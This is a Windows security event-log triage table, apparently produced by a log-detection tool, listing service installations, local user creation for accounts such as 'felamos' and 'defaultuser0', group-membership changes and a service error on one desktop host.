&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:45:13 &#9474; &#8227; Rare Service Installations        &#9474; 1     &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;                                  &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:45:13 &#9474; &#8227; Rare Service Installations        &#9474; 1     &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;                                  &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:45:15 &#9474; &#8227; Rare Service Installations        &#9474; 1     &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;                                  &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:46:03 &#9474; &#8227; A Member Was Added to             &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4728     &#9474; 245       &#9474; DESKTOP-8IRBDLK &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; a Security-Enabled Global           &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474; Group                               &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1000       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: WIN-CT4CCI7F   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TCO                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: None             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-513        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: WIN-CT4CCI7FT   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; CO$                              &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:46:03 &#9474; &#8227; Local User Creation               &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4720     &#9474; 246       &#9474; DESKTOP-8IRBDLK &#9474; UserWorkstations: '%%1793'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; OldUacValue: '0x0'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; NewUacValue: '0x15'              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserPrincipalName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: WIN-CT4CCI7F   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TCO                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonHours: '%%1797'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptPath: '%%1793'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PasswordLastSet: '%%1794'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserParameters: '%%1793'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProfilePath: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AllowedToDelegateTo: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomePath: '%%1793'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AccountExpires: '%%1794'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DisplayName: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomeDirectory: '%%1793'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: felamos          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserAccountControl: "\r\n\t\t%   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; %2080\r\n\t\t%%2082\r\n\t\t%%2   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 084"                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SidHistory: '-'                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1000       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SamAccountName: felamos          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: WIN-CT4CCI7FT   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; CO$                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrimaryGroupId: '513'            &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:46:05 &#9474; &#8227; A Member Was Added to             &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4728     &#9474; 267       &#9474; DESKTOP-8IRBDLK &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; a Security-Enabled Global           &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474; Group                               &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1001       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: None             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-513        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: WIN-CT4CCI7FT   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; CO$                              &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:46:05 &#9474; &#8227; Local User Creation               &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4720     &#9474; 268       &#9474; DESKTOP-8IRBDLK &#9474; UserWorkstations: '%%1793'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; OldUacValue: '0x0'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; NewUacValue: '0x15'              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserPrincipalName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonHours: '%%1797'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptPath: '%%1793'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PasswordLastSet: '%%1794'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserParameters: '%%1793'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProfilePath: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AllowedToDelegateTo: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomePath: '%%1793'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AccountExpires: '%%1794'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DisplayName: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomeDirectory: '%%1793'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: defaultuser0     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserAccountControl: "\r\n\t\t%   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; %2080\r\n\t\t%%2082\r\n\t\t%%2   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 084"                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SidHistory: '-'                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1001       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SamAccountName: defaultuser0     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: WIN-CT4CCI7FT   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; CO$                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrimaryGroupId: '513'            &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-14 16:28:24 &#9474; &#8227; Windows Service Terminated        &#9474; 1     &#9474; Service Control Manager        &#9474; 7023     &#9474; 407       &#9474; DESKTOP-8IRBDLK &#9474; Binary: '460044005200650073005   &#9474;
&#9474;                     &#9474; With Error                          &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 000750062000000'                 &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; param1: FDResPub                 &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; param2: '%%2147952449'           &#9474;
